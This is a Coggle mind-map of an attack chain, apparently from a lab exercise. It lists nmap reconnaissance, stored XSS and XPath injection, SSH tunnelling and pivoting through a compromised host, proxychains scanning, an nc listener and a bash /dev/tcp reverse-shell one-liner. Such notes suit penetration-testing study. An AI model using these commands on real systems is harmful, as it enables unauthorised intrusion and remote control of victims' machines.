Please enable JavaScript.
Coggle requires JavaScript to display documents.
Attacker - Coggle Diagram
Attacker
Reconnaissance
Port Scanning
nmap
nmap -A xxx.xxx.xxx.xxx
Public Website
Ports in use
Port 80
Port 22
Services in Use
HTTP
SSH
Internal Management WebSite
Services in Use
HTTP
SSH
Ports in use
Port 80
Port 22
Public WebSearch
XSS-Stored
Reverse Shell
Get user credentials
Vulnerability
XSS-Stored(Public Website)
XPATH Injection(Internal Management WebSite
Attacker
ssh -D 1080 -N -f
vctim@172.32.0.15
proxychains4 nmap -sT -Pn 172.16.0.20
Port 80 is found
ssh -L 10000:172.16.0.20:80
vctim@172.32.0.15
Internal Management WebSearch
Reverse Shell via Web Shell Deployment Using XPath Injection
start /b ssh -N -R 9999:localhost:9999
kali@192.168.2.10
nc -lvnp 9999
bash -i >& /dev/tcp/192.168.1.20/4444 0>&1
Shell a Get
Weaponization
Tools
SSH
nmap
proxychains4
Victim